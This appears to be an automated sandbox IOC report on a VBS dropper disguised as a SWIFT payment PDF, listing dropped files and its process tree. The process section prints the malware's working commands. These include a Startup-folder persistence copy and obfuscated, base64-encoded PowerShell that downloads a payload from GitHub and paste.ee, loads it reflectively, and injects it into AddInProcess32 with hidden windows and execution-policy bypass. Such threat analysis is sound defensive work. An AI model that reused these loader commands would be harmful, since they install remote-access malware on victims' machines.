IOC Report
SWIFT 103 202406111301435660 110624-pdf.vbs

loading gif

Files

File Path
Type
Category
Malicious
SWIFT 103 202406111301435660 110624-pdf.vbs
Unicode text, UTF-16, little-endian text, with CRLF line terminators
initial sample
malicious
C:\ProgramData\remcos\logs.dat
data
dropped
malicious
C:\ProgramData\Microsoft\Network\Downloader\edb.log
data
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.db
Extensible storage engine DataBase, version 0x620, checksum 0xb1e5c325, page size 16384, DirtyShutdown, Windows version 10.0
dropped
C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm
data
dropped
C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
data
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_1ifvlxbh.5u0.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5avviu1a.yux.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kveck0rz.0zi.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_s3iz5jqp.rtb.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vxrxvq1y.b0m.ps1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yatzni5m.cvg.psm1
ASCII text, with no line terminators
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Wed Oct 4 12:54:07 2023, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnk
MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Fri Oct 4 08:33:59 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
dropped
C:\Windows\ServiceProfiles\LocalService\AppData\Local\FontCache\Fonts\Download-1.tmp
JSON data
dropped
Chrome Cache Entry: 182
PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 183
PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 184
JSON data
dropped
Chrome Cache Entry: 185
PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 186
ASCII text, with very long lines (46884)
dropped
Chrome Cache Entry: 187
HTML document, ASCII text, with very long lines (639), with CRLF, LF line terminators
downloaded
Chrome Cache Entry: 188
ASCII text, with no line terminators
downloaded
Chrome Cache Entry: 189
ASCII text, with very long lines (65410)
dropped
Chrome Cache Entry: 190
JSON data
dropped
Chrome Cache Entry: 191
JSON data
dropped
Chrome Cache Entry: 192
ASCII text, with very long lines (65410)
downloaded
Chrome Cache Entry: 193
SVG Scalable Vector Graphics image
dropped
Chrome Cache Entry: 194
JSON data
downloaded
Chrome Cache Entry: 195
JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 1000x300, components 3
downloaded
Chrome Cache Entry: 196
ASCII text, with CRLF line terminators
downloaded
Chrome Cache Entry: 197
PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 198
ASCII text, with CRLF line terminators
dropped
Chrome Cache Entry: 199
Web Open Font Format (Version 2), TrueType, length 19360, version 1.0
downloaded
Chrome Cache Entry: 200
ASCII text, with very long lines (52717), with no line terminators
dropped
Chrome Cache Entry: 201
ASCII text, with very long lines (52717), with no line terminators
downloaded
Chrome Cache Entry: 202
exported SGML document, ASCII text, with very long lines (65536), with no line terminators
downloaded
Chrome Cache Entry: 203
JPEG image data, Exif standard: [TIFF image data, big-endian, direntries=6, orientation=upper-left, xresolution=86, yresolution=94, resolutionunit=2], baseline, precision 8, 1000x300, components 3
dropped
Chrome Cache Entry: 204
PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 205
MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
downloaded
Chrome Cache Entry: 206
JSON data
dropped
Chrome Cache Entry: 207
MS Windows icon resource - 6 icons, -128x-128, 16 colors, 72x72, 16 colors
dropped
Chrome Cache Entry: 208
PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 209
ASCII text, with very long lines (32271), with no line terminators
dropped
Chrome Cache Entry: 210
JSON data
downloaded
Chrome Cache Entry: 211
PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
downloaded
Chrome Cache Entry: 212
ASCII text, with very long lines (46884)
downloaded
Chrome Cache Entry: 213
JSON data
downloaded
Chrome Cache Entry: 214
JSON data
dropped
Chrome Cache Entry: 215
exported SGML document, ASCII text, with very long lines (65536), with no line terminators
dropped
Chrome Cache Entry: 216
ASCII text, with very long lines (65536), with no line terminators
downloaded
Chrome Cache Entry: 217
ASCII text, with very long lines (32271), with no line terminators
downloaded
Chrome Cache Entry: 218
PNG image data, 475 x 212, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 219
PNG image data, 658 x 480, 8-bit/color RGBA, non-interlaced
dropped
Chrome Cache Entry: 220
JSON data
dropped
Chrome Cache Entry: 221
JSON data
downloaded
Chrome Cache Entry: 222
SVG Scalable Vector Graphics image
downloaded
Chrome Cache Entry: 223
PNG image data, 533 x 478, 8-bit/color RGBA, non-interlaced
dropped
There are 51 hidden files, click here to show them.

Processes

Path
Cmdline
Malicious
C:\Windows\System32\wscript.exe
C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT 103 202406111301435660 110624-pdf.vbs"
malicious
C:\Windows\System32\cmd.exe
"C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 & powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\PING.EXE
ping 127.0.0.1 -n 10
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -command [System.IO.File]::Copy('C:\Windows\system32\SWIFT 103 202406111301435660 110624-pdf.vbs', 'C:\Users\' + [Environment]::UserName + ''\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ sbv.etirenrew.vbs')')
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigodkFSaWFiTGUgJypNZFIqJykubmFtZVszLDExLDJdLUpPaW4nJykgKCAoJ3UnKycwRHUnKydybCcrJyA9IEonKydodWh0dHBzJysnOi8nKycvcmEnKyd3LmdpJysndGh1YicrJ3VzZScrJ3Jjb250ZW50JysnLicrJ2NvJysnbS9Ob0RldGVjdE8nKyduLycrJ05vRGV0ZScrJ2MnKyd0T24vJysncmVmJysncycrJy9oJysnZWEnKydkcy9tYWluJysnLycrJ0RldGFoTm8nKyd0aC1WLnR4JysndEonKydodTsgdTBEYicrJ2FzZTY0Q29udGUnKydudCA9ICcrJyhOZXctT2JqZScrJ2N0IFN5cycrJ3RlbS5OZXQuV2ViJysnQ2xpJysnZScrJ250KScrJy5Eb3dubG9hZFN0JysncicrJ2luZyh1MEQnKyd1cmwpOyB1MCcrJ0RiaScrJ25hJysncicrJ3lDb250ZW50JysnID0gW1N5cycrJ3QnKydlJysnbS4nKydDbycrJ24nKyd2JysnZScrJ3InKyd0XScrJzo6RicrJ3JvbUJhc2U2NFN0cmknKyduZycrJyh1MERiYXNlJysnNjRDb250ZScrJ250KTsgJysndScrJzBEYXNzJysnZW1ibHknKycgPSBbUmVmbCcrJ2VjJysndGlvbi5BJysnc3NlbWInKydsJysneV0nKyc6OkwnKydvYScrJ2QnKycoJysndTAnKydEYicrJ2luJysnYScrJ3J5QycrJ29udCcrJ2VudCknKyc7IFtkbmxpYi5JJysnTycrJy5IbycrJ21lXTo6VkEnKydJJysnKGQ2ZzAnKycvJysnTycrJ1lVJysnbFgvZC9lZScrJy5ldHNhcC8vOnNwJysndHRoZCcrJzYnKydnLCBkJysnNmdkZXNhJysndCcrJ2l2JysnYScrJ2RvZDZnJysnLCBkJysnNmcnKydkZScrJ3NhdCcrJ2l2JysnYWRvJysnZDYnKydnLCAnKydkNmdkZXMnKydhdGl2YWRvZDZnJysnLCBkJysnNicrJ2dBZGRJJysnbicrJ1ByJysnb2NlcycrJ3MzMicrJ2Q2ZywgZDYnKydnZDZnJysnLGQnKyc2Z2Q2JysnZyknKS5yRXBsQUNlKCd1MEQnLCckJykuckVwbEFDZSgoW2NIYVJdNzQrW2NIYVJdMTA0K1tjSGFSXTExNyksW1NUckluZ11bY0hhUl0zOSkuckVwbEFDZSgnZDZnJyxbU1RySW5nXVtjSGFSXTM0KSk=';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((vARiabLe '*MdR*').name[3,11,2]-JOin'') ( ('u'+'0Du'+'rl'+' = J'+'huhttps'+':/'+'/ra'+'w.gi'+'thub'+'use'+'rcontent'+'.'+'co'+'m/NoDetectO'+'n/'+'NoDete'+'c'+'tOn/'+'ref'+'s'+'/h'+'ea'+'ds/main'+'/'+'DetahNo'+'th-V.tx'+'tJ'+'hu; u0Db'+'ase64Conte'+'nt = '+'(New-Obje'+'ct Sys'+'tem.Net.Web'+'Cli'+'e'+'nt)'+'.DownloadSt'+'r'+'ing(u0D'+'url); u0'+'Dbi'+'na'+'r'+'yContent'+' = [Sys'+'t'+'e'+'m.'+'Co'+'n'+'v'+'e'+'r'+'t]'+'::F'+'romBase64Stri'+'ng'+'(u0Dbase'+'64Conte'+'nt); '+'u'+'0Dass'+'embly'+' = [Refl'+'ec'+'tion.A'+'ssemb'+'l'+'y]'+'::L'+'oa'+'d'+'('+'u0'+'Db'+'in'+'a'+'ryC'+'ont'+'ent)'+'; [dnlib.I'+'O'+'.Ho'+'me]::VA'+'I'+'(d6g0'+'/'+'O'+'YU'+'lX/d/ee'+'.etsap//:sp'+'tthd'+'6'+'g, d'+'6gdesa'+'t'+'iv'+'a'+'dod6g'+', d'+'6g'+'de'+'sat'+'iv'+'ado'+'d6'+'g, '+'d6gdes'+'ativadod6g'+', d'+'6'+'gAddI'+'n'+'Pr'+'oces'+'s32'+'d6g, d6'+'gd6g'+',d'+'6gd6'+'g)').rEplACe('u0D','$').rEplACe(([cHaR]74+[cHaR]104+[cHaR]117),[STrIng][cHaR]39).rEplACe('d6g',[STrIng][cHaR]34))"
malicious
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
"C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
malicious
C:\Windows\SysWOW64\svchost.exe
svchost.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
malicious
C:\Windows\SysWOW64\svchost.exe
svchost.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\SysWOW64\svchost.exe
svchost.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\SysWOW64\svchost.exe
svchost.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\SysWOW64\svchost.exe
svchost.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\SysWOW64\svchost.exe
svchost.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\SysWOW64\svchost.exe
svchost.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\SysWOW64\svchost.exe
svchost.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\SysWOW64\svchost.exe
svchost.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\SysWOW64\svchost.exe
svchost.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\SysWOW64\svchost.exe
svchost.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\SysWOW64\svchost.exe
svchost.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Windows\SysWOW64\svchost.exe
svchost.exe
malicious
C:\Windows\System32\conhost.exe
C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
malicious
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2432 --field-trial-handle=2360,i,8934632438909745951,2213681595228066499,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2020,i,18065770690636922477,5919200967098741641,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1180,i,15662417021116800271,17959301878097503911,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2116 --field-trial-handle=1968,i,15358586014354363738,1738356423128360891,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2060 --field-trial-handle=2000,i,16637610320917934916,565223346788031028,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1184,i,1130476888448619373,4472464422477594584,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2004,i,2937470017902191409,5218832269953484114,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2084 --field-trial-handle=2008,i,16121129215091139583,4677272960365539008,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2052 --field-trial-handle=2008,i,16982306025501434778,10627650727957162702,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2064 --field-trial-handle=2008,i,18146508179752881524,919200875560916846,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2044 --field-trial-handle=2008,i,15823624400460166783,6536935139452576376,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2080 --field-trial-handle=1964,i,5440842566350035257,10787203092068946937,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2092 --field-trial-handle=2032,i,11553977204438472227,7445186355205850417,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2032 --field-trial-handle=1988,i,7374315475741238408,2210743874770523791,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2040 --field-trial-handle=2000,i,3916554340437548015,1500443498568681016,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2132 --field-trial-handle=2016,i,9777007145685273446,11700763769562909530,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2028 --field-trial-handle=1968,i,9602569947055018222,14101658706447688223,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1500 --field-trial-handle=1492,i,7162340336741099282,8203552688004924699,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=svchost.exe&platform=0009&osver=7&isServer=0&shimver=4.0.30319.0
C:\Program Files\Google\Chrome\Application\chrome.exe
